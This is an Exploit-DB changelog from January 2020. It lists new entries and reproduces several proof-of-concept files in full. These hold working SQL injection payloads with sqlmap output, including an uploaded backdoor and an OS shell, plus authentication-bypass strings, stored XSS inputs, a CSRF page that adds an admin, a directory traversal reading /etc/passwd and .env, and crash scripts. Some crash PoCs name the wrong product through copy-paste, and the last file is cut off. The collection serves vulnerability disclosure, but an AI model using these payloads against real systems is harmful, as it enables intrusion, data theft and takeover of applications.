DB: 2020-01-07

33 changes to exploits/shellcodes

NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service
NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)
SpotIE 2.9.5 - 'Key' Denial of Service (PoC)
Dnss Domain Name Search Software - 'Key' Denial of Service (PoC)
BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)
ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC)
NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC)
Dnss Domain Name Search Software - 'Name' Denial of Service (PoC)
TextCrawler Pro3.1.1 - Denial of Service (PoC)
RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC)
Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC)
RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC)
NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC)
Office Product Key Finder 1.5.4 - Denial of Service (PoC)
SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC)
SpotMSN 2.4.6 - 'Name' Denial of Service (PoC)
SpotIM 2.2 - 'Name' Denial Of Service
FTPGetter Professional 5.97.0.223 -  Denial of Service (PoC)
Duplicate Cleaner Pro 4 - Denial of Service (PoC)
Microsoft Outlook VCF cards - Denial of Service (PoC)
Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path
Windows - Shell COM Server Registrar Local Privilege Escalation
Dairy Farm Shop Management System 1.0 - 'username' SQL Injection
Complaint Management System 4.0 - 'cid' SQL injection
IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting
Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin)
Hostel Management System 2.0 - 'id' SQL Injection
elaniin CMS 1.0 - Authentication Bypass
Small CRM 2.0 - Authentication Bypass
Voyager 1.3.0 - Directory Traversal
Codoforum 4.8.3 - Persistent Cross-Site Scripting
Django < 3.0 < 2.2 < 1.11 - Account Hijack

Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)

exploits/hardware/webapps/47850.txt

@@ -0,0 +1,35 @@
+# Exploit Title: IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting
+# Date: 2020-01-02 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.ibm.com/il-en
+# Hardware Link: https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?infotype=AN&subtype=CA&htmlfid=897/ENUS105-476&appname=USN
+# Vulernability Type: Cross-site Scripting
+# Vulenrability: Stored XSS
+# CVE: N/A
+
+# Description :
+# Ricoh (IBM) InfoPrint 1532 devices allow Stored XSS via the 1.network.6.10 parameter to the
+# cgi-bin/posttest/cgi-bin/dynamic/config/gen/general.html URI. (HTML Injection can also occur.)
+
+HTTP Request :
+
+POST /cgi-bin/posttest/cgi-bin/dynamic/config/gen/general.html HTTP/1.1
+Host: 134.84.35.70
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 281
+Origin: https://134.84.35.70
+Connection: close
+Referer: https://134.84.35.70/cgi-bin/dynamic/config/gen/general.html
+Upgrade-Insecure-Requests: 1
+
+0.printer.1.14=0&0.mfp.1.2=0&0.mfp.1.3=0&0.mfp.1.1=30&0.mfp.100.11=30&0.printer.4.258=1&1.network.6.10=%22%3E%3Cscript%3Ealert%28%22ismailtasdelen%22%29%3C%2Fscript%3E&1.network.6.11=&0.network.6.4=90&1.network.6.69=000000000000&2.network.6.63=0&0.network.10.73=120&1.printer.1.40=
+
+HTTP Response :
+
+HTTP/1.0 200 OK
+Content-Type: text/html
+Content-Length: 269

exploits/php/webapps/47846.txt

@@ -0,0 +1,164 @@
+# Exploit Title: Dairy Farm Shop Management System 1.0 - 'username' SQL Injection
+# Google Dork: N/A
+# Date: 2020-01-03
+# Exploit Author: Chris Inzinga
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
+# Version: v1.0
+# Tested on: Windows
+# CVE: N/A
+
+# The Dairy Farm Shop Management System 1.0 web application is vulnerable to 
+# SQL injection in multiple areas. The most severe of these is the username 
+# parameter on the login page as this injection can be done unauthenticated.
+
+
+================================ 'username' - SQLi ================================
+
+POST /dfsms/index.php HTTP/1.1
+Host: 192.168.0.33
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.0.33/dfsms/index.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 34
+Connection: close
+Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
+Upgrade-Insecure-Requests: 1
+
+username=test&password=test&login=
+
+---
+Parameter: username (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: username=test' AND (SELECT 5667 FROM (SELECT(SLEEP(5)))mKGL) AND 'UlkV'='UlkV&password=test&login=
+---
+[INFO] the back-end DBMS is MySQL
+back-end DBMS: MySQL >= 5.0.12
+
+
+
+================================ 'category' & 'categorycode' - SQLi ================================
+
+POST /dfsms/add-category.php HTTP/1.1
+Host: 192.168.0.33
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.0.33/dfsms/add-category.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 39
+Connection: close
+Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
+Upgrade-Insecure-Requests: 1
+
+category=test&categorycode=test&submit=
+
+---
+Parameter: category (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: category=test' AND (SELECT 8892 FROM (SELECT(SLEEP(5)))WzFH) AND 'NELe'='NELe&categorycode=test&submit=
+---
+[INFO] the back-end DBMS is MySQL
+back-end DBMS: MySQL >= 5.0.12
+
+---
+Parameter: categorycode (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: category=test&categorycode=test' AND (SELECT 9140 FROM (SELECT(SLEEP(5)))bzQA) AND 'izaK'='izaK&submit=
+---
+[INFO] the back-end DBMS is MySQL
+back-end DBMS: MySQL >= 5.0.12
+
+
+
+================================ 'companyname' - SQLi ================================
+
+---
+Parameter: companyname (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: companyname=test' AND (SELECT 7565 FROM (SELECT(SLEEP(5)))znna) AND 'bEUm'='bEUm&submit=
+---
+[INFO] the back-end DBMS is MySQL
+back-end DBMS: MySQL >= 5.0.12
+
+
+
+================================ 'productname' & 'productprice' - SQLi ================================
+
+---
+Parameter: productname (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: category=Milk&company=Amul&productname=test' AND (SELECT 1171 FROM (SELECT(SLEEP(5)))rlQI) AND 'RgaN'='RgaN&productprice=test&submit=
+---
+---
+Parameter: productprice (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: category=Milk&company=Amul&productname=test&productprice=test' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))BRuk) AND 'Imqh'='Imqh&submit=
+---
+[INFO] the back-end DBMS is MySQL
+back-end DBMS: MySQL >= 5.0.12
+
+
+
+================================ 'fromdate' & 'todate' - SQLi ================================
+
+---
+Parameter: todate (POST)
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+    Payload: fromdate=2020-01-05&todate=-6737' OR 3099=3099#&submit=
+
+    Type: error-based
+    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: fromdate=2020-01-05&todate=2020-01-31' OR (SELECT 3665 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(3665=3665,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mqby&submit=
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: fromdate=2020-01-05&todate=2020-01-31' AND (SELECT 5717 FROM (SELECT(SLEEP(5)))adaE)-- cLAK&submit=
+
+    Type: UNION query
+    Title: MySQL UNION query (NULL) - 5 columns
+    Payload: fromdate=2020-01-05&todate=2020-01-31' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x666369456150614b454a4f51454e6e687449724a786445585455515a67614162754545716d476f6f,0x716a7a7171),NULL#&submit=
+
+Parameter: fromdate (POST)
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: fromdate=2020-01-05' AND (SELECT 7128 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(7128=7128,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Tzxh&todate=2020-01-31&submit=
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: fromdate=2020-01-05' AND (SELECT 7446 FROM (SELECT(SLEEP(5)))Aklw)-- uzkF&todate=2020-01-31&submit=
+---
+
+
+
+================================ 'mobilenumber' & 'emailid' & 'adminname' - SQLi ================================
+
+---
+Parameter: emailid (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: adminname=Admin&username=admin&emailid=admin@test.com' AND (SELECT 5884 FROM (SELECT(SLEEP(5)))EgFJ) AND 'kFGt'='kFGt&mobilenumber=1234567899&update=
+---
+---
+Parameter: adminname (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: adminname=Admin' AND (SELECT 5969 FROM (SELECT(SLEEP(5)))vpfG) AND 'kOJS'='kOJS&username=admin&emailid=admin@test.com&mobilenumber=1234567899&update=
+---
+---
+Parameter: mobilenumber (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: adminname=Admin&username=admin&emailid=admin@test.com&mobilenumber=1234567899' AND (SELECT 1163 FROM (SELECT(SLEEP(5)))rdwj) AND 'mnwu'='mnwu&update=
+---

exploits/php/webapps/47847.txt

@@ -0,0 +1,45 @@
+# Exploit Title: Complaint Management System 4.0 - 'cid' SQL injection
+# Google Dork: N/A
+# Date: 2020-01-03
+# Exploit Author: FULLSHADE
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/complaint-management-sytem/
+# Version: v4.0
+# Tested on: Windows 7
+# CVE : N/A
+
+Description:
+
+The Complaint Management System v4.0 application from PHPgurukul is vulnerable to
+blind SQL injection via the 'cid' parameter which is found on the complaint-details.php
+page.
+
+========== 1. SQLi ==========
+
+SQLMAP POC:
+
+GET parameter 'cid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
+sqlmap identified the following injection point(s) with a total of 1748 HTTP(s) requests:
+---
+Parameter: cid (GET)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: cid=2'+(SELECT 0x7648556f WHERE 4476=4476 AND SLEEP(5))+'
+---
+
+The ?cid parameter is vulnerable to sql injection within the
+
+the vulnerable URL = https://10.0.0.214/complaint%20management%20system/cms/admin/complaint-details.php?cid=2
+
+request:
+
+GET /complaint%20management%20system/cms/admin/complaint-details.php?cid=2 HTTP/1.1
+Host: 10.0.0.214
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=5bmri9rlp1jvrjkhgumn7v9fot
+Upgrade-Insecure-Requests: 1

exploits/php/webapps/47851.txt

@@ -0,0 +1,138 @@
+# Exploit Title:  Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin)
+# Date: 2020-01-05
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://intelliants.com/
+# Software Link : https://github.com/intelliants/subrion/releases/tag/v4.0.5
+# Software : Subrion CMS
+# Product Version: v 4.0.5.10
+# Vulernability Type : Cross-Site Request Forgery (Add Admin)
+# Vulenrability : Cross-Site Request Forgery
+# CVE : N/A
+
+# Description :
+# CSRF vulnerability was discovered in v4.0.5 version of Subrion CMS.
+# With this vulnerability, authorized users can be added to the system.
+
+HTML CSRF PoC :
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <script>
+      function submitRequest()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "https:\/\/SERVER\/_core\/admin\/members\/add\/", true);
+        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------9973334999367242361642875270");
+        xhr.withCredentials = true;
+        var body = "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"__st\"\r\n" +
+          "\r\n" +
+          "41209a5f43b0d7c8cef0e7ffcd9ce160\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"username\"\r\n" +
+          "\r\n" +
+          "ismailtasdelen\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"fullname\"\r\n" +
+          "\r\n" +
+          "Ismail Tasdelen\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"email\"\r\n" +
+          "\r\n" +
+          "test@mail.com\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"_password\"\r\n" +
+          "\r\n" +
+          "Test1234!\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"_password2\"\r\n" +
+          "\r\n" +
+          "Test1234!\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"usergroup_id\"\r\n" +
+          "\r\n" +
+          "1\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"v[avatar[]]\"\r\n" +
+          "\r\n" +
+          "\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"avatar[]\"; filename=\"\"\r\n" +
+          "Content-Type: application/octet-stream\r\n" +
+          "\r\n" +
+          "\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"website\"\r\n" +
+          "\r\n" +
+          "https://ismailtasdelen.com\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"phone\"\r\n" +
+          "\r\n" +
+          "0000000000000000000\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"biography\"\r\n" +
+          "\r\n" +
+          "NULL\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"facebook\"\r\n" +
+          "\r\n" +
+          "\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"twitter\"\r\n" +
+          "\r\n" +
+          "\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"gplus\"\r\n" +
+          "\r\n" +
+          "\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"linkedin\"\r\n" +
+          "\r\n" +
+          "\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"sponsored\"\r\n" +
+          "\r\n" +
+          "0\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"plan_id\"\r\n" +
+          "\r\n" +
+          "2\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"sponsored_end\"\r\n" +
+          "\r\n" +
+          "2020-02-05 05:18:43\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"featured\"\r\n" +
+          "\r\n" +
+          "0\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"featured_end\"\r\n" +
+          "\r\n" +
+          "2020-02-05 05:19\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"status\"\r\n" +
+          "\r\n" +
+          "active\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"save\"\r\n" +
+          "\r\n" +
+          "Add\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"goto\"\r\n" +
+          "\r\n" +
+          "list\r\n" +
+          "-----------------------------9973334999367242361642875270--\r\n";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i);
+        xhr.send(new Blob([aBody]));
+      }
+    </script>
+    <form action="#">
+      <input type="button" value="Submit request" onclick="submitRequest();" />
+    </form>
+  </body>
+</html>

exploits/php/webapps/47854.txt

@@ -0,0 +1,49 @@
+# Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection
+# Google Dork: intitle: "Hostel management system"
+# Date: 2020-01-03
+# Exploit Author: FULLSHADE
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/hostel-management-system/
+# Version: v2.0
+# Tested on: Windows
+# CVE : N/A
+
+Description:
+
+The Hostel Management System v2.0 application from PHPgurukul is vulnerable to
+SQL injection via the 'id' parameter on the full-profile.php page.
+
+==================== 1. SQLi ====================
+
+http://10.0.0.214/Hostel%20management%20System%20Project/hostel/full-profile.php?id=1
+
+THe ?id parameter is vulnerable to SQL injection, it was also tested, and a un-authenticated
+user has the full ability to run system commands via --os-shell and fully compromise the system
+
+GET parameter 'id' is vulnerable.
+
+---
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+    Payload: id=-3444' OR 1650=1650#
+
+    Type: error-based
+    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: id=1' OR (SELECT 3801 FROM(SELECT COUNT(*),CONCAT(0x7176627a71,(SELECT (ELT(3801=3801,1))),0x71707a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- klCZ
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 OR time-based blind
+    Payload: id=1' OR SLEEP(5)-- slKU
+
+    Type: UNION query
+    Title: MySQL UNION query (NULL) - 29 columns
+    Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627a71,0x63786c795a416371494752765744487a4e6443636e705076586e714d735a7053595a4b676b526157,0x71707a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
+
+[14:20:08] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpulczr.php
+[14:20:08] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpbjdvm.php
+[14:20:08] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
+os-shell> whoami
+do you want to retrieve the command standard output? [Y/n/a] y
+command standard output: 'john-pc\john'
+os-shell>

exploits/php/webapps/47858.txt

@@ -0,0 +1,30 @@
+# Exploit Title: elaniin CMS 1.0 - Authentication Bypass
+# Author: riamloo
+# Date: 2020-01-02
+# Vendor Homepage: https://elaniin.com/ ( github ==> https://github.com/elaniin/ )
+# Software Link: https://github.com/elaniin/CMS/archive/master.zip
+# Version: 1
+# CVE: N/A
+# Tested on: Win 10
+
+# Discription:
+# Open-source Content Management System created with PHP + MySQL https://elaniin.com/
+# Vulnerability: Attacker can bypass login page and access to dashboard page
+# vulnerable file : login.php
+# Parameter & Payload: '=''or'
+# Proof of Concept:
+http://localhost/elaniin/login.php
+
+POST /elaniin/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+Content-Length: 334
+Referer: http://localhost/elaniin/login.php
+Cookie: PHPSESSID=81spdqht0gvh0f97vg62nzxs8
+Connection: close
+Upgrade-Insecure-Requests: 1
+email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN

exploits/php/webapps/47874.txt

@@ -0,0 +1,35 @@
+# Exploit Title: Small CRM 2.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-01-02
+# Exploit Author: FULLSHADE
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/small-crm-php/
+# Version: V2.0
+# Tested on: Windows
+# CVE : N/A
+
+# Description:
+#
+# There is a SQL injection vulnerability in the /index.php page
+# which allows for an attacker to use the SQLi login bypass payload
+# '=''or' for both the username and password parameters, this allows
+# for any authenticated or low level user to login to the admin account.
+
+========== 1. Authentication bypass ==========
+
+POST /Small%20CRM%20Projects%20Using%20PHP%20and%20MySQL/crm/admin/index.php HTTP/1.1
+Host: 10.0.0.214
+User-Agent: Mozilla/5.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 57
+Origin: http://10.0.0.214
+DNT: 1
+Connection: close
+Referer: http://10.0.0.214/Small%20CRM%20Projects%20Using%20PHP%20and%20MySQL/crm/admin/index.php
+Cookie: PHPSESSID=k5845lo7s90it5p33js75665jq
+Upgrade-Insecure-Requests: 1
+
+email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&login=

exploits/php/webapps/47875.txt

@@ -0,0 +1,50 @@
+# Exploit Title: Voyager 1.3.0 - Directory Traversal
+# Google Dork: N/A
+# Date: January 2020-01-06
+# Exploit Author: NgoAnhDuc
+# Vendor Homepage: https://voyager.devdojo.com/
+# Software Link:https://github.com/the-control-group/voyager/releases/tag/v1.3.0https://github.com/the-control-group/voyager/releases/tag/v1.2.7
+# Version: 1.3.0 and bellow
+# Tested on: Ubuntu 18.04
+# CVE : N/A
+
+
+Vulnerable code is in voyager/src/Http/Controllers/VoyagerController.php
+
+========================================
+
+public function assets(Request $request)
+    {
+        *$path = str_start(str_replace(['../', './'], '',
+urldecode($request->path)), '/');*
+*        $path = base_path('vendor/tcg/voyager/publishable/assets'.$path);*
+        if (File::exists($path)) {
+            $mime = '';
+            if (ends_with($path, '.js')) {
+                $mime = 'text/javascript';
+            } elseif (ends_with($path, '.css')) {
+                $mime = 'text/css';
+            } else {
+                $mime = File::mimeType($path);
+            }
+            $response = response(File::get($path), 200,
+['Content-Type' => $mime]);
+            $response->setSharedMaxAge(31536000);
+            $response->setMaxAge(31536000);
+            $response->setExpires(new \DateTime('+1 year'));
+            return $response;
+        }
+        return response('', 404);
+    }
+========================================
+
+PoC:
+
+passwd:
+
+http://localhost/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2Fetc/passwd
+
+
+Laravel environment
+file:http://localhost/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F<web
+root dir>/.env

exploits/php/webapps/47876.txt

@@ -0,0 +1,22 @@
+# Exploit Title: Codoforum 4.8.3 - Persistent Cross-Site Scripting
+# Google Dork: intext:"Powered by Codoforum"
+# Date: 2020-01-03
+# Exploit Author: Prasanth c41m, Vyshnav Vizz
+# Vendor Homepage: https://codoforum.com/index.php
+# Software Link: https://codoforum.com/buy
+# Version: Codoforum 4.8.3 
+# Tested on: [relevant os]
+# CVE : [if applicable]
+# source: https://medium.com/@c41m/b2e1133c6a91?
+
+Codoforum is prone to a stored xss vulnerability.
+An attacker can exploit this issue to creating user with payload and perform cross-site scripting attacks.
+Codoforum version 4.8.3 is vulnerable. 
+
+1. Install Codoforum 4.8.3 in a local server.
+2. Goto http://localhost/index.php?u=/user/register
+3. Create a user using :- 
+			username : "><svg/onload=alert(1)>
+			password : password
+			email    : c41m@email.com
+4. Now goto http://localhost/admin/index.php?page=users/manage, an XSS alert popup will be triggered here.

exploits/python/webapps/47879.md

@@ -0,0 +1,31 @@
+EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47879.zip
+
+
+# django_cve_2019_19844_poc
+PoC for [CVE-2019-19844](https://www.djangoproject.com/weblog/2019/dec/18/security-releases/)
+
+# Requirements
+
+- Python 3.7.x
+- PostgreSQL 9.5 or higher
+
+## Setup
+
+1. Create database(e.g. `django_cve_2019_19844_poc`)
+1. Set the database name to the environment variable `DJANGO_DATABASE_NAME`(e.g. `export DJANGO_DATABASE_NAME=django_cve_2019_19844_poc`)
+1. Run `pip install -r requirements.txt && ./manage.py migrate --noinput`
+1. Create the following user with `shell` command:
+
+```python
+>>> from django.contrib.auth import get_user_model
+>>> User = get_user_model()
+>>> User.objects.create_user('mike123', 'mike@example.org', 'test123')
+```
+
+## Procedure For Reproducing
+
+1. Run `./manage.py runserver`
+1. Open `http://127.0.0.1:8000/accounts/password-reset/`
+1. Input `mıke@example.org` (Attacker's email), and click send button
+1. Receive email (Check console), and reset password
+1. Login as `mike123` user

exploits/windows/dos/47848.py

@@ -0,0 +1,33 @@
+# Exploit Title: NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install NetShareWatcher
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.NetShareWatcher Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")

exploits/windows/dos/47853.py

@@ -0,0 +1,33 @@
+# Exploit Title: NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install BlueAuditor
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.BlueAuditor Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")

exploits/windows/dos/47855.py

@@ -0,0 +1,33 @@
+# Exploit Title: SpotIE 2.9.5 - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/spotie_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install BlueAuditor
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.BlueAuditor Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
